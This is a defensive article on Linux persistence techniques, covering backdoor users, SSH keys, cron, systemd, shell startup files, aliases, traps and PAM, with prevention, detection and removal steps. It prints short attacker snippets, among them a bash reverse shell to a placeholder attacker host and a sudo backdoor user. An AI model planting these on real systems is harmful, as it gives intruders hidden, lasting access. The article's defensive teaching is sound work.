Persistence Mechanisms

Persistence is one of the most critical stages in a cyberattack: once an attacker has access, they want to make sure they can come back even if their initial entry point is closed. At Black Hat USA 2025, John Hammond presented several lesser-known Linux persistence techniques that defenders should be aware of.

In this article, I’ll review both common and lesser-known techniques, and, most importantly, how to prevent, detect, and remove them.

Common Persistence Techniques

1. Adding a Backdoor User

adduser attacker
usermod -aG sudo attacker

Prevention

  • Enforce centralized authentication (LDAP, AD, or PAM hardening).

  • Disable direct root login; use only known accounts with key-based auth.

  • Use tools like aide or osquery to monitor system files.

Detection

  • Check /etc/passwd and /etc/shadow for unexpected users.

  • Audit /etc/group for sudo/wheel membership.

  • Use lastlog to spot accounts that suddenly appear.

Removal

  • deluser attacker (or userdel -r attacker).

  • Review /home/attacker for artifacts.


2. Adding SSH Keys

ssh-copy-id user@<VICTIM_IP>

Prevention

  • Restrict permissions: chmod 600 ~/.ssh/authorized_keys.

  • Use centralized key management.

  • Monitor with auditd for changes to .ssh directories.

Detection

  • Inspect ~/.ssh/authorized_keys for unknown keys.

  • Audit /etc/ssh/sshd_config for unusual settings (AuthorizedKeysCommand).

  • Look for hidden files like /opt/.hiddenkeys.

Removal

  • Remove the malicious key line from authorized_keys.

  • Restart SSH if system-wide config was modified.


3. Cron Jobs

echo "<frequency> backdoor_script" | crontab -

Prevention

  • Restrict cron usage to trusted users (/etc/cron.allow, /etc/cron.deny).

  • Monitor changes with auditd.

Detection

  • Run crontab -l for each user.

  • Inspect /etc/crontab, /etc/cron.*.

  • Use systemctl list-timers.

Removal

  • Delete the malicious entry.

  • Kill any still-running process started by it.


4. Systemd Services

Malicious .service files:

[Service]
ExecStart=/usr/bin/<backdoor>

Prevention

  • Restrict sudo usage; don’t allow untrusted users to modify /etc/systemd/.

  • Use tripwire/aide to monitor changes.

Detection

  • systemctl list-unit-files | grep enabled.

  • Look for strange files in /etc/systemd/system/.

  • Check logs: journalctl -u <service>.

Removal

systemctl disable <malicious>.service
systemctl stop <malicious>.service
rm /etc/systemd/system/<malicious>.service

5. RC Files (.bashrc, .profile, etc.)

Malicious lines in shell startup files:

bash -i >& /dev/tcp/<attacker>/4444 0>&1

Prevention

  • Apply least privilege: don’t allow attackers to write to home dirs.

  • Use restricted shells where possible.

Detection

  • Inspect hidden dotfiles in /home/*.

  • Look for suspicious commands (netcat, bash -i, curl | sh).

  • Use integrity monitoring.

Removal

  • Remove injected lines.

  • Rebuild affected dotfiles if unsure.


Lesser-Known Persistence Techniques

6. Environment Variables

export PROMPT_COMMAND="<backdoor> &"

Prevention

  • Restrict write access to environment configs.

  • Regular audits of environment variables.

Detection

  • printenv for unusual variables.

  • Audit /etc/environment and /etc/profile.d/.

Removal

  • unset PROMPT_COMMAND.

  • Clean .bashrc, .profile, /etc/profile.d/.


7. Trap Debug Hijack

trap "<backdoor> &" DEBUG

Prevention

  • Lock down dotfiles.

  • Monitor for shell modifications.

Detection

  • Inspect ~/.bashrc for trap commands.

  • trap -p to list active traps.

Removal

trap - DEBUG

Then clean startup files.


8. Aliases

alias ls="backdoor & ls --color=auto"

Prevention

  • Enforce minimal shell profiles.

  • Integrity monitoring.

Detection

  • Run alias to list defined aliases.

  • Inspect ~/.bashrc, ~/.zshrc, /etc/bash.bashrc.

Removal

unalias ls

Remove alias definitions from dotfiles.

grep -r "alias" /

9. SSH Config Abuse

Host *
  ProxyCommand <backdoor> %h %p

Prevention

  • Enforce strict permissions: chmod 600 configs.

  • Monitor for hidden files in /opt/, /etc/ssh/.

Detection

  • Inspect ~/.ssh/config and /etc/ssh/ssh_config.

  • Look for ProxyCommand or unexpected AuthorizedKeysCommand.

Removal

  • Clean suspicious config directives.

  • Restart SSH.


10. PAM Degradation

Attackers may patch or replace PAM modules for stealth persistence.

Prevention

  • Only install signed packages.

  • Enable kernel module integrity checks (IMA/EVM).

  • Monitor with osquery.

Detection

  • Verify PAM configs: /etc/pam.d/*.

  • Check integrity of libraries in /lib/security/.

  • Use ldd to detect replaced shared objects.

Removal

  • Restore PAM configs from backup.

  • Reinstall libpam packages.


Conclusion

Persistence mechanisms range from blatant (extra users, cron jobs) to subtle (aliases, PAM tampering). The key for defenders is:

  • Prevent: enforce least privilege, configuration management and root access protection.

  • Detect: monitor system integrity (osquery, aide, auditd).

  • Remove: restore from clean backups, audit thoroughly.

Awareness is the first step because persistence is only effective if it goes unnoticed.

Ressources

Last updated